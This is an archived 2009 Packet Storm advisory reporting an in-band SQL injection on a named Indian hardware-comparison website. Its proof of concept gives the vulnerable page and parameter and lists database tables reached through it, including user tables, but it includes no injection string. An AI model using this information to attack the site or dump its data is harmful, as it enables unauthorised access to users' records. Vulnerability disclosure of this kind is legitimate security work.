compareindia.in.com SQL Injection

2009-02-18T00:00:00
ID PACKETSTORM:75027
Type packetstorm
Reporter Jaydeep Dave
Modified 2009-02-18T00:00:00

Description

`====================================================================  
Website: http://compareindia.in.com/  
  
Category: India's biggest hardware comparison website + buyer's guide  
  
Vulnerability: Inband SQL Injection  
  
Founder: Jaydeep Dave [jaydipdave@gmail.com]  
  
Date: 16th Feb, 2009  
====================================================================  
  
== P O C ===========================================================  
  
URL:  
http://compareindia.in.com/writeyourreview.php?prodid=3333  
  
  
Database: compareindia  
[124 tables]  
+-------------------+  
| expertanswer |  
| companymaster |  
| cmslog |  
| phpbb_users |  
| storerating |  
| boxmanagement |  
| dealemaster |  
| dealerupload |  
| pollresults |  
| productdetails |  
| users |  
| specorder |  
| ... |  
+-------------------+  
  
  
====================================================================  
`